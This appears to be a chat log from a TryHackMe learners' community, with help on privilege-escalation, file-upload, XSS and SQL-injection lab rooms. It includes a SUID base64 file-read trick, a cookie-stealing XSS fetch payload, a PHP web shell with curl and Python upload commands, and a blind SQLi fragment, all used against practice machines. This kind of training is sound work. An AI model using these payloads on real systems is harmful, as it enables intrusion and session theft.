hmmm, I'm not getting a respone back either

Same

maybe someone else can take a look 🤷‍♂️

Hope so

I'm pretty certain that 10.2.123.80 is not your tun0 IP, so probably check on that

That's a US server IIRC?

shadow has 10.11 ip

for tryhackme vpn

Is it? Ok, never saw the vpn starting with 10.2 so far

which is the european vip 1 vpn server

Muir has a list somewhere

hey guys if anyone can help me it would be great. Im in linux privesc task 7. i unshadowed the passwd and shadow file and can log in as user2 or gerryconway, however none of them have privileges to read flag3. Am i supposed to look at GUID bits again for these users again and exploit further? or am i missing something

you did not get the root password???

no

only Karen, user2 and gerryconway

hmmm

how did you read the /etc/shadow file???

because that one is owned by root

base64

decode thingy

what is stopping you from using the same method that you used to read the /etc/shadow file to read the flag file????

so i can use bas64decode to read non base64 encoded stuff?

ohhhh

nvm

i get it

thanks lol

so stuff im not supposed to read is encoded in base64 to me?

base64 /path/to/file | base64 --decode

the pipe char is useful

Which one is suid/has file read?

they are talking about this room task 7 question 3: https://tryhackme.com/room/linprivesc

and in that task you use the base64 binary that has a owner of root and suid bit set

Ok, so it's base64, that's the answer to my question. That's all good then

but how do i know that fla3.txt is base64 encoded?

It doesn't need to be

You're encoding it with that first command, and then immediately decoding it

^

oh wow

that makes sense

cool trick lol

base64 is being used there because it's running as root and can read the file. This is a misconfiguration on the system, which you're exploiting

the base64 binary can also be used in this way if someone restricts the use of the cat command

binary in this context == executable file

makes sense

i noticed some of the binaries cant be found on gtfo bins. is that because there's not exploits for them or they're not executable files?

most of the time no exploits for them.... and sometimes because they are not executables but those are rarer

If they're custom programs, they won't be on there.

GTFOBins focusses on widely installed linux programs that can be abused for further goals

okay cool thanks for the info!

It is though, I already checked it out

https://tryhackme.com/room/uploadvulns: On this room , I cannot connect to the machine even though I am connected to the THM openvpn and I've also added the line at the end of my etc/hosts (as told to do in task 1)

I cannot connect to the machine What happens? What doesn't happen? What do you see?

shows this

Ok, and did you read the page and the instructions in the first task?

You cannot access it by IP

yes, I did

I don't think you did, seeing as you are trying to access it by IP address.

🤦‍♂️ Ohh sorry! Now I can connect but where it was told to not to connect with Ip.

You weren't told to connect by IP, you made that assumption and the content told you to connect by VHOST

Ohhk. My bad

Thanks for ur help

can someone tell me more basic way to learn metasploit

i complete modules

Offensive Security offer Metasploit Unleashed as a free course for learning metasploit

thanks you sir

finally popped a php reverse shell using rfi

Am literally crying

it's my first shell

I have good news and bad news

bad first

The bad news is RFI is very very rare in real life, in fact in PHP it has to be explicitly enabled for any version from the last 10 years or so.

The good news is you got a shell

If it has turned obsolete why do we have a room for it

RFI is a small part of that room

Obsolete tech is still in use, but you make a very valid point

And a few of us have raised that point with the tryhackme team before

But I was stuck in that for like 2-3 hrs and it was preventing me from completing the room so ..... i got very excited

That's always good, learning troubleshooting is a critical skill

Sir, The attacks which we have learned to do for http domain can also be done for https domain?

1. Why are you asking me this?
2. Have you researched that information?

The solution was to use http for the target website, the target website opened in https for me

I was just thinking coz of this ^

http didnt work when the site was opened in https

Weren't you prompted to read up about mixed content?

#junior-pentester-path message

Sorry I didnt know the exact link of that content..

Thankx for the link

You'd find information through research

Research is critical to hacking

I see

Tried to solve task 8 using netcat but it didnt work.. If you have the same problem u can just type

sudo python -m http.server

And get the port number which is generally 8000.

And paste it in the url with ip.

U will get a GET Request after some time with the staff cookie. It took 2-3 minutes for me to get it.

I see

Thought so coz I tried everything using netcat but to no avail

So shifted to web server

Did that too.. Congratz though for first successful shell

im done!!

should i do the comptia path or offensive pentesting path next?

pentest plus/comptia path will be quick now

Is the comptia exam worth it for employment you think?

well that depends on who you ask and what you are applying for and how much money you have as a resource

Congratz bro

thanks dude!

Gave +1 Rep to @pastel stream

i tried postman sites,insomnia,etc... but nothing seems to work?can anybody let me know my mistake?

The answer in is the task.

You're literally looking at it.

website.thm?

No.

Think of what the task is asking.

Then look at the last paragraph for text matching it.

I say paragraph, it's really just one big long sentence.

i got it

thanks

thanks @remote iris

Gave +1 Rep to @remote iris

Why do you think the connection is refusing for ports FTP ? I tried both 20 and 21. And I am in the netSec challenge room where the only tools you are asked to use are nmap, telnet and hydra.

Use -Sv in nmap scan to get the version of ftp

How can you say that 20,21 are reserved ports for nonstandardized ftp ports without even scanning?

I have to use the nonstandard port in the example

10021

Of course!

can anyone help me my vmware is lagging a lot I have allotted 8gb of ram with 80gb memory and 4 processors

someone can help me

maybe run the provided command to install gcc 👀

sudo apt install gcc

i dont have permission

i am trying to solve linpriv room

I can see you're using wsl, but you should be able to install programs

i will try again from attackbox

If you looking for help, I always suggest adding the room and the task that you are doing to your question.
Regarding that task, it's just showing you how to priv esc if LD_PRELOAD is set.
To solve the room questions, it's not necessary or even possible to do.

Okay thanks

Gave +1 Rep to @shadow echo

What would the body parameters of the first request that Burp Suite sends be? can anybody help me in this question ?

in battering ram ?

ohkyy

Hey, i stuck at Xss room in jr penterster path, actually in the last task(where we have to steal staff cookie) i have setup the perfect listener and i can see my cookies, but staff is not clicking on my ticket?

VM or attackbox?

VM

What is your machine target ip?

Actually after doing many attempts i turned it off for a while, but i know that it starts with 10.11

If you turned it off it won't matter, haha.

What was your payload?

</textarea><script>fetch('http://{URL_OR_IP}?cookie=' + btoa(document.cookie) );</script>

For the staff i waited 1 hour still nothing... X3

Task stated that you will get cookies in 2-3mins

Did you use the machine IP or your own THM ip?

I used my Own IP that i got from Ovpn

tun0

Bro i did 3-4 times

I just did it, and got the staff cookie right away

Ok in few moments i ll turn it on again and i ll see again if i can get the cookie

Okk

Are you using netcat or the request catcher?

Py web srvr

😦

</textarea><script>fetch('http://<myIP>:8000?cookie=' + btoa(document.cookie) );</script> this the payload that i am using

Use netcat

ok but do i have to terminate the machine and start it from scratch?

No

ok

It's just your listener that you're changing

Check if the target website is in http or https

Dude i am using http and i can see my cookie whenever i click on the ticket..

I tried nc even, but nothing worked

Not u but the acmeitwebsite

I knowwww

I am using http in that website and for my server too

Then refer to one of the community forums for the Blind XSS room

One guy wrote the whole walkthrough step by step

Refer it

Same

guys I want to become a junior pentester

which way should I follow

hey guys I'm currently on the burp suite room and my site map does not catch the url so I cant get the flag... am i missing something?

Hi All, I have a question. Im doing the room "Exploit Vulnerabilities" on task 5 and im trying to figure out a way to upload a php file without using the exploit db EDB-ID:47887 python script. I am trying to use curl to upload the file(i save my php file as test1.php):

curl -X POST -F image=@/root/test1.php -F title=asdf -F author=asdf -F price=1 -F publisher=Apress http://<ip-addr>/admin_add.php

But to no success. I kept getting the same html response without any error showing. My golden question is how does one translate python code

requests.post('http://<ip-addr>/admin_add.php', files={'image': ('test1.php', '<?php echo shell_exec($_GET[\'cmd\']); ?>', 'text/php')}, data={'add':'1'}, verify=False)

to curl

note requests.post('http://<ip-addr>/admin_add.php', files={'image': ('test1.php', '<?php echo shell_exec($_GET[\'cmd\']); ?>', 'text/php')}, data={'add':'1'}, verify=False)

is my way of one lining

url = args.url.rstrip('/')
random_file = ''.join(random.choice(string.ascii_letters + string.digits) for i in range(10))

payload = '<?php echo shell_exec($_GET['cmd']); ?>'

file = {'image': (random_file + '.php', payload, 'text/php')}
print('> Attempting to upload PHP web shell...')
r = requests.post(url + '/admin_add.php', files=file, data={'add':'1'}, verify=False)

from the EDB-ID:47887 python script

i've figure it out curl -X POST -F image=@/root/test1.php -F add=1 http://10.10.102.118/admin_add.php
works

Hi, I'm on the File Inclusion room - task 8, and I'm trying to get the first flag, but till now everything I tried didn't work. The hint says: "Change the form method to POST in the page source or use a tool like Burp to modify the method of the request POST." and that's what I'm doing, but for some reason, it's not working out. Could someone help me, please?

just changing it in the proxy of burp will not be enough and you should probably use repeater

I changed to POST on burp and I also tried with curl command

I'll try that

Shoud I edited something else on the Repeater?

I forgot about the URL thing when using POST, thanks

Gave +1 Rep to @steel nymph

content length seems missing too

Still didn't work, but thanks for trying

Gave +1 Rep to @sage current

welp

I don't think challenge 1 is done on the playground page

So I found the exploit for task five of the "Exploit Vulnerabilities" Room on the exploit-db website, and downloaded it to my root machine. when I tried to run the exploit with the " online_bookstore.py -u http://10.10.210.125 -c "whoami"" I get "command not found"

You have to prepend ./ to the file in order to run it

so "./online_bookstore.py -u http://10.10.210.125/ -c "whoami""?

Yes

Or run it with whatever python version that script is, so like python2 online_bookstore.py

Completed the Jr pentesting

Do you think I should execute the "chmod +x" command to resolve this "Permission Denied" issue?

yes

Why am I getting this error: ./online_bookstore.py http://10.10.1.2/

I looked at my code and couldn't see the error

Try running it as python3 online_bookstore.py http://10.10.1.2/

Thanks, that worked beautifully

anyone sat the CREST CRT here

any tips

is blind sqli - time based task bugged on sql injection room? i find table name as ||anayltics_referrers|| but seems like it should be|| users||?

No it's not bugged, a database can hold several tables, so after you found the ||analytics_referrer|| table you could have tried if there are some more 🙂

i tried but it didnt find any other tables : (

How did you search for the ||users|| table ?

after a long time of struggling i watched a youtube tutorial video explaining the room, and saw there

No I mean you said you didn't found any other table, what was the URL you entered to search for that next table ?

i had done something like

||table_name like '%' and table name !=||||'analytics_referrers' ||||||

and it was negative ( sleep function did not execute)

I would need to see the full URL, not just parts of it, but you should have been able to find the other table the same way as you found the first one

So going through all the letters

i tried it again to send you the full url and it worked now, how weird..

thanks

Gave +1 Rep to @shadow echo

Ye probably just some typo, so that's why always sending the full and exact command/payload you have used to check on that, so best to copy paste or send screenshots of what you have tried in order to be able to catch such typos 🙂

Burpsuite sitemap, scope....

is the proxy in intercept mode or are you letting all requests through

intercept mode please

I have even added the the ip to the scope

So disable intercept, otherwise your requests not going to the webserver and therefore you most likely have nothing in the sitemap